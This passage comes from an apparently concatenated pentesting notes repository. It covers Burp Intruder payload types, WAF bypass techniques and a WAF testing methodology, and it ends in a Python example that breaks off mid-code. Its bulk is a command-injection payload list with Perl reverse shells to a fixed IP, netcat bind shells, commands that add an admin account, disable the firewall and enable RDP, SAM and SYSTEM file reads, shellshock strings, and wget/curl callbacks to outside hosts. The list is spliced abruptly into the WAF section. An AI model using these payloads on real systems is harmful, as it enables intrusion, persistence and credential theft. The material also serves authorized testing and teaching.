Good for a large list of payloads, so it doesn’t have to hold the whole fucking thing in memory and crash 49 | 50 | Case modification - make it uppercase, lowercase, no change, Proper Name, Proper name 51 | 52 | Numbers - 53 | 54 | Type : sequential or random generation 55 | 56 | From : first 57 | 58 | To : last \(highest number possible\) 59 | 60 | Step : if sequentially, whats the increment 61 | 62 | How many : total number of payloads generated \(random only\) 63 | 64 | Character substitution : what gets swapped for what 65 | 66 | JANN \( let's set a > 5 , n > y\) will create all of the following 67 | 68 | J5NN 69 | 70 | J5YN 71 | 72 | J5YY 73 | 74 | J5NY 75 | 76 | JAYN 77 | 78 | JANY 79 | 80 | JAYY 81 | 82 | Custom iterator : 83 | 84 | Recursive grep - based on what you're grepping for, will produce future payloads. Like a server's error message may reveal a path to discover content. 85 | 86 | -what to grep for \(and make payloads from\) 87 | 88 | -first payload 89 | 90 | -stop if duplicate payload found 91 | 92 | * Illegal Unicode -variations to bypass WAFs via continuation bytes, overlong encodings, similar looking characters 93 | * Character blocks -set to fuzz buffer overflow or logic flaws \(bypass mandatory length min/max in forms, end up at a strange path\) 94 | * Dates set for birth date, wedding, anniversary, etc to brute force passwords 95 | * Parameters are From \(first date\) To \(last date\), step \(increment for sequential - days, weeks, months, years\) and format \(Mon v Monday, 2 v 02, 9 v 09 v 2009\) 96 | 97 | Brute Forcer 98 | 99 | Character set : set of characters to use 100 | 101 | Min length 102 | 103 | Max length 104 | 105 | * Null Payloads - same ass payload over and over… for Denial of service, keeping session token alive or producing new cookies from same request 106 | * Character frobber - a slow cycle thru the base string,one character at a time. 
Used to test a session token, to see if tiny changes have an effect or if it can be figured out.
* Bit Flipper - operates on the base value of the payload position or on another string. Flips bits from least to most significant \(ASCII hex\)
* Username generator - sets up a list of names or emails from a source, so "Snake Pliskin" would produce snakepliskin, snake.pliskin, pliskinsnake, pliskin.snake, pliskin, snake, pliskins
  * For when you target a user but don't know their username
* ECB block shuffler - tokens encrypted with ECB are built from blocks of 8 or 16 bytes, so you can register a user like aaaaaaadmin and shuffle the ciphertext blocks to get through authorization
* Extension Generated - like from Hackvertor's encodings/decodings or XSS Validator's PhantomJS component
* Copy other payload - copies another payload in the same attack setup, like if you're using cluster bomb, pitchfork or battering ram
  * Useful when you need the same payload types, sets and dictionaries, just in different positions

--------------------------------------------------------------------------------
/waf-bypasses/general-waf-torment.md:
--------------------------------------------------------------------------------

# General WAF torment

Generally, a WAF bypass will be one of these three types.

1. **Pre-Processor:** the WAF skips the input validation completely
2. **Impedance Mismatch**: the WAF interprets the input differently than the server
3. **Rule set bypass**: the payload is too sneaky or futuristic for the WAF

A WAF may have rules to change a certain input, prevent it from being passed to the server, or block the IP completely. To be successful, you must be patient and understand what you are doing, as throwing fat polyglot payloads will not work most of the time, while something painfully simple may do the trick.
Take your time and fuzz the input intelligently, so you can figure out a bypass if you suspect a susceptible endpoint.
**Bypass methods:**

Adding new headers unfamiliar to the WAF, with their own payloads as a value:

* X-Originating-IP
* X-Forwarded-For
* X-Remote-IP
* X-Remote-Addr

Maybe the WAF only looks at GET and POST requests, whereas THICCBABY as an HTTP method may glide through.

**HTTP Parameter Pollution**

Depending on the back-end system, this is often dealt with in very different ways. For example, adding another of the same parameter with a different value, as below...

```text
/?productid=1&productid=2
```

**ASP.NET** parses it into `productid=1,2`
**JSP** parses it into `productid=1`
**PHP** parses it into `productid=2`

**Combining SQL Injection and Parameter Pollution**

An injected SQL query like the one below...

```text
?productid=select 1,2,3 from table
```

can be turned into a parameter pollution attack and divided in a number of different ways

```text
?productid=select 1&productid=2,3 from table
```

Will this be combined? Will the server take just the first parameter's value? Just the second and third?

Other than that, you can try all the various encodings, though URL and double URL encoding will be the most successful.

_Double URL encoding example:_

```text
1 union select 1,2,3
's' -> %73 -> %25%37%33
1 union %25%37%33elect 1,2,3
```

's' via URL encoding becomes `%73`, which can be encoded again to create `%25%37%33`

If you really want to bypass WAFs in the current year.
62 | `' 191 | echo ''// XXXXXXXXXXX 192 | | echo "" > rfi.php 193 | ; echo "" > rfi.php 194 | & echo "" > rfi.php 195 | && echo "" > rfi.php 196 | echo "" > rfi.php 197 | | echo "" > dir.php 198 | ; echo "" > dir.php 199 | & echo "" > dir.php 200 | && echo "" > dir.php 201 | echo "" > dir.php 202 | | echo "" > cmd.php 203 | ; echo "" > cmd.php 204 | & echo "" > cmd.php 205 | && echo "" > cmd.php 206 | echo "" > cmd.php 207 | ;echo '' 208 | echo ''// XXXXXXXXXXX 209 | echo ''// XXXXXXXXXXX 210 | | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl 211 | ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl 212 | & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 213 | && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 214 | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 215 | () { :;}; echo vulnerable 10 216 | eval('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 217 | eval('ls') 218 | eval('pwd') 219 | eval('pwd'); 220 | eval('sleep 5') 221 | eval('sleep 5'); 222 | eval('whoami') 223 | eval('whoami'); 224 | exec('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 225 | exec('ls') 226 | exec('pwd') 227 | exec('pwd'); 228 | exec('sleep 5') 229 | exec('sleep 5'); 230 | exec('whoami') 231 | exec('whoami'); 232 | ;{$_GET["cmd"]} 233 | `id` 234 | |id 235 | | id 236 | ;id 237 | ;id| 238 | ;id; 239 | & id 240 | &&id 241 | ;id\n 242 | ifconfig 243 | | ifconfig 244 | ; ifconfig 245 | & ifconfig 246 | && ifconfig 247 | /index.html|id| 248 | ipconfig 249 | | ipconfig /all 250 | ; ipconfig /all 251 | & ipconfig /all 252 | && ipconfig /all 253 | ipconfig /all 254 
| ls 255 | $(`ls`) 256 | | ls -l / 257 | ; ls -l / 258 | & ls -l / 259 | && ls -l / 260 | ls -l / 261 | | ls -laR /etc 262 | ; ls -laR /etc 263 | & ls -laR /etc 264 | && ls -laR /etc 265 | | ls -laR /var/www 266 | ; ls -laR /var/www 267 | & ls -laR /var/www 268 | && ls -laR /var/www 269 | | ls -l /etc/ 270 | ; ls -l /etc/ 271 | & ls -l /etc/ 272 | && ls -l /etc/ 273 | ls -l /etc/ 274 | ls -lh /etc/ 275 | | ls -l /home/* 276 | ; ls -l /home/* 277 | & ls -l /home/* 278 | && ls -l /home/* 279 | ls -l /home/* 280 | *; ls -lhtR /var/www/ 281 | | ls -l /tmp 282 | ; ls -l /tmp 283 | & ls -l /tmp 284 | && ls -l /tmp 285 | ls -l /tmp 286 | | ls -l /var/www/* 287 | ; ls -l /var/www/* 288 | & ls -l /var/www/* 289 | && ls -l /var/www/* 290 | ls -l /var/www/* 291 | \n 292 | \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` 293 | \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` 294 | \n/bin/ls -al\n 295 | | nc -lvvp 4444 -e /bin/sh| 296 | ; nc -lvvp 4444 -e /bin/sh; 297 | & nc -lvvp 4444 -e /bin/sh& 298 | && nc -lvvp 4444 -e /bin/sh & 299 | nc -lvvp 4444 -e /bin/sh 300 | nc -lvvp 4445 -e /bin/sh & 301 | nc -lvvp 4446 -e /bin/sh| 302 | nc -lvvp 4447 -e /bin/sh; 303 | nc -lvvp 4448 -e /bin/sh& 304 | \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n 305 | \necho INJECTX\nexit\n\033[2Asleep 5\n 306 | \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n 307 | | net localgroup Administrators hacker /ADD 308 | ; net localgroup Administrators hacker /ADD 309 | & net localgroup Administrators hacker /ADD 310 | && net localgroup Administrators hacker /ADD 311 | net localgroup Administrators hacker /ADD 312 | | netsh firewall set opmode disable 313 | ; netsh firewall set opmode disable 314 | & netsh firewall set opmode disable 315 | && netsh firewall set opmode disable 316 | netsh firewall set opmode disable 317 | netstat 318 | ;netstat -a; 319 | | netstat -an 320 
| ; netstat -an 321 | & netstat -an 322 | && netstat -an 323 | netstat -an 324 | | net user hacker Password1 /ADD 325 | ; net user hacker Password1 /ADD 326 | & net user hacker Password1 /ADD 327 | && net user hacker Password1 /ADD 328 | net user hacker Password1 /ADD 329 | | net view 330 | ; net view 331 | & net view 332 | && net view 333 | net view 334 | \nid| 335 | \nid; 336 | \nid\n 337 | \n/usr/bin/id\n 338 | perl -e 'print "X"x1024' 339 | || perl -e 'print "X"x16096' 340 | | perl -e 'print "X"x16096' 341 | ; perl -e 'print "X"x16096' 342 | & perl -e 'print "X"x16096' 343 | && perl -e 'print "X"x16096' 344 | perl -e 'print "X"x16384' 345 | ; perl -e 'print "X"x2048' 346 | & perl -e 'print "X"x2048' 347 | && perl -e 'print "X"x2048' 348 | perl -e 'print "X"x2048' 349 | || perl -e 'print "X"x4096' 350 | | perl -e 'print "X"x4096' 351 | ; perl -e 'print "X"x4096' 352 | & perl -e 'print "X"x4096' 353 | && perl -e 'print "X"x4096' 354 | perl -e 'print "X"x4096' 355 | || perl -e 'print "X"x8096' 356 | | perl -e 'print "X"x8096' 357 | ; perl -e 'print "X"x8096' 358 | && perl -e 'print "X"x8096' 359 | perl -e 'print "X"x8192' 360 | perl -e 'print "X"x81920' 361 | || phpinfo() 362 | | phpinfo() 363 | {${phpinfo()}} 364 | ;phpinfo() 365 | ;phpinfo();// 366 | ';phpinfo();// 367 | {${phpinfo()}} 368 | & phpinfo() 369 | && phpinfo() 370 | phpinfo() 371 | phpinfo(); 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | :phpversion(); 380 | `ping 127.0.0.1` 381 | & ping -i 30 127.0.0.1 & 382 | & ping -n 30 127.0.0.1 & 383 | ;${@print(md5(RCEVulnerable))}; 384 | ${@print("RCEVulnerable")} 385 | ${@print(system($_SERVER['HTTP_USER_AGENT']))} 386 | pwd 387 | | pwd 388 | ; pwd 389 | & pwd 390 | && pwd 391 | \r 392 | | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 393 | ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 394 | & reg add 
"HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 395 | && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 396 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 397 | \r\n 398 | route 399 | | sleep 1 400 | ; sleep 1 401 | & sleep 1 402 | && sleep 1 403 | sleep 1 404 | || sleep 10 405 | | sleep 10 406 | ; sleep 10 407 | {${sleep(10)}} 408 | & sleep 10 409 | && sleep 10 410 | sleep 10 411 | || sleep 15 412 | | sleep 15 413 | ; sleep 15 414 | & sleep 15 415 | && sleep 15 416 | {${sleep(20)}} 417 | {${sleep(20)}} 418 | {${sleep(3)}} 419 | {${sleep(3)}} 420 | | sleep 5 421 | ; sleep 5 422 | & sleep 5 423 | && sleep 5 424 | sleep 5 425 | {${sleep(hexdec(dechex(20)))}} 426 | {${sleep(hexdec(dechex(20)))}} 427 | sysinfo 428 | | sysinfo 429 | ; sysinfo 430 | & sysinfo 431 | && sysinfo 432 | system('cat C:\boot.ini'); 433 | system('cat config.php'); 434 | || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 435 | | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 436 | ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 437 | & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 438 | && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 439 | system('curl https://crowdshield.com/.testing/rce_vuln.txt') 440 | system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') 441 | system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); 442 | system('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 443 | systeminfo 444 | | systeminfo 445 | ; systeminfo 446 | & systeminfo 447 | && systeminfo 448 | system('ls') 449 | system('pwd') 450 | system('pwd'); 451 | || system('sleep 5'); 452 | | system('sleep 5'); 453 | ; system('sleep 5'); 454 | & system('sleep 5'); 455 | && system('sleep 5'); 456 | system('sleep 5') 457 | system('sleep 5'); 458 | system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') 459 | system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); 460 | 
system('whoami') 461 | system('whoami'); 462 | test*; ls -lhtR /var/www/ 463 | test* || perl -e 'print "X"x16096' 464 | test* | perl -e 'print "X"x16096' 465 | test* & perl -e 'print "X"x16096' 466 | test* && perl -e 'print "X"x16096' 467 | test*; perl -e 'print "X"x16096' 468 | $(`type C:\boot.ini`) 469 | &&type C:\\boot.ini 470 | | type C:\Windows\repair\SAM 471 | ; type C:\Windows\repair\SAM 472 | & type C:\Windows\repair\SAM 473 | && type C:\Windows\repair\SAM 474 | type C:\Windows\repair\SAM 475 | | type C:\Windows\repair\SYSTEM 476 | ; type C:\Windows\repair\SYSTEM 477 | & type C:\Windows\repair\SYSTEM 478 | && type C:\Windows\repair\SYSTEM 479 | type C:\Windows\repair\SYSTEM 480 | | type C:\WINNT\repair\SAM 481 | ; type C:\WINNT\repair\SAM 482 | & type C:\WINNT\repair\SAM 483 | && type C:\WINNT\repair\SAM 484 | type C:\WINNT\repair\SAM 485 | type C:\WINNT\repair\SYSTEM 486 | | type %SYSTEMROOT%\repair\SAM 487 | ; type %SYSTEMROOT%\repair\SAM 488 | & type %SYSTEMROOT%\repair\SAM 489 | && type %SYSTEMROOT%\repair\SAM 490 | type %SYSTEMROOT%\repair\SAM 491 | | type %SYSTEMROOT%\repair\SYSTEM 492 | ; type %SYSTEMROOT%\repair\SYSTEM 493 | & type %SYSTEMROOT%\repair\SYSTEM 494 | && type %SYSTEMROOT%\repair\SYSTEM 495 | type %SYSTEMROOT%\repair\SYSTEM 496 | uname 497 | ;uname; 498 | | uname -a 499 | ; uname -a 500 | & uname -a 501 | && uname -a 502 | uname -a 503 | |/usr/bin/id 504 | ;|/usr/bin/id| 505 | ;/usr/bin/id| 506 | $;/usr/bin/id 507 | () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' 508 | () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 509 | | wget http://crowdshield.com/.testing/rce.txt 510 | & wget http://crowdshield.com/.testing/rce.txt 511 | ; wget https://crowdshield.com/.testing/rce_vuln.txt 512 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) 513 | && wget 
https://crowdshield.com/.testing/rce_vuln.txt
wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
whoami
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{4+4}}
{{4+8}}
{{person.secret}}
{{person.name}}
{1} + {1}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{{[].__class__.__base__.__subclasses__()}}
```

**References :**

**Testing for Command Injection \(OTG-INPVAL-013\)**

* 👉 [owasp.org/index.php/Testing\_for\_Command\_Injection\_\(OTG-INPVAL-013\)](https://www.owasp.org/index.php/Testing_for_Command_Injection_%28OTG-INPVAL-013%29)

**OWASP Command Injection**

* 👉 [owasp.org/index.php/Command\_Injection](https://www.owasp.org/index.php/Command_Injection)

**CWE-77: Improper Neutralization of Special Elements used in a Command \('Command Injection'\)**

* 👉 [http://cwe.mitre.org/data/definitions/77.html](http://cwe.mitre.org/data/definitions/77.html)

**CWE-78: Improper Neutralization of Special Elements used in an OS Command \('OS Command Injection'\)**

* 👉 [http://cwe.mitre.org/data/definitions/78.html](http://cwe.mitre.org/data/definitions/78.html)

**PortSwigger Web Security - OS Command Injection**

* 👉 [portswigger.net/kb/issues/00100100\_os-command-injection](https://portswigger.net/kb/issues/00100100_os-command-injection)
--------------------------------------------------------------------------------
/waf-bypasses/testing-methodology-evasion-techniques.md:
--------------------------------------------------------------------------------

---
description: via 0xInfection's excellent AwesomeWAF page (in resources)
---

# Testing Methodology/Evasion techniques

#### Where To Look:

* Always look out for the common ports that expose a WAF, namely `80`, `443`, `8000`, `8008`, `8080` and `8088`.

> **Tip:** You can automate this easily from the command line using tools like [cURL](https://github.com/curl/curl).

* Some WAFs set their own cookies in requests \(eg. Citrix Netscaler, Yunsuo WAF\).
* Some associate themselves with separate headers \(eg. Anquanbao WAF, Amazon AWS WAF\).
* Some often alter headers and jumble characters to confuse the attacker \(eg. Netscaler, Big-IP\).
* Some expose themselves in the `Server` header \(eg. Approach, WTS WAF\).
* Some WAFs expose themselves in the response content \(eg. DotDefender, Armor, Sitelock\).
* Other WAFs reply with unusual response codes upon malicious requests \(eg. WebKnight, 360 WAF\).

#### Detection Techniques:

To identify a WAF, we need to \(dummy\) provoke it.

1. Make a normal GET request from a browser, intercept and record response headers \(specifically cookies\).
2. Make a request from the command line \(eg. cURL\), and test response content and headers \(no user-agent included\).
3. Make GET requests to random open ports and grab banners which might expose the WAF's identity.
4. If there is a login page somewhere, try some common \(easily detectable\) payloads like `" or 1 = 1 --`.
5. If there is some input field somewhere, try with noisy payloads like ``.
6. Attach a dummy `../../../etc/passwd` to a random parameter at the end of the URL.
7.
Append some catchy keywords like `' OR SLEEP(5) OR '` at the end of URLs to any random parameter.
8. Make GET requests with outdated protocols like `HTTP/0.9` \(`HTTP/0.9` does not support POST type queries\).
9. Many times, the WAF varies the `Server` header upon different types of interactions.
10. Drop Action Technique - Send a raw crafted FIN/RST packet to the server and identify the response.

> **Tip:** This method could be easily achieved with tools like [HPing3](http://www.hping.org/) or [Scapy](https://scapy.net/).

11. Side Channel Attacks - Examine the timing behaviour of the request and response content.

#### Fuzzing/Bruteforcing:

**Method:**

Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:

* Wordlists specifically for fuzzing
  * [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing)
  * [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
  * [Other Payloads](https://github.com/foospidy/payloads)

**Technique:**

* Load up your wordlist into the fuzzer and start the bruteforce.
* Record/log all responses from the different payloads fuzzed.
* Use random user-agents, ranging from Chrome Desktop to iPhone browser.
* If blocking is noticed, increase fuzz latency \(eg. 2-4 secs\).
* Always use proxychains, since chances are real that your IP gets blocked.

**Drawbacks:**

* This method often fails.
* Many times your IP will be blocked \(temporarily/permanently\).

#### Regex Reversing:

**Method:**

* Most efficient method of bypassing WAFs.
* Some WAFs rely upon matching the attack payloads with the signatures in their databases.
* When the payload matches the reg-ex, the WAF triggers an alarm.
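As an added illustration, not part of the AwesomeWAF material this page summarises, the Python below models the probable keyword regex from the SQL injection case under Techniques, runs that case's blocked and bypassed payloads through it, and contrasts it with the allow-list validation a defender should use instead. The payload strings are the page's own; `FILTER_STEPS`, `walk_case`, `is_valid_id` and `lookup_user_sql` are names I chose.

```python
"""Keyword blacklist (regex signature) versus allow-list validation.

Added example: models the probable regex from this page's SQL injection
case, step by step, and shows why each added keyword only invites the next
bypass, while a strict type check on the parameter ends the game.
"""
import re

# Blacklist state after each of the first four steps of the walkthrough.
FILTER_STEPS = [
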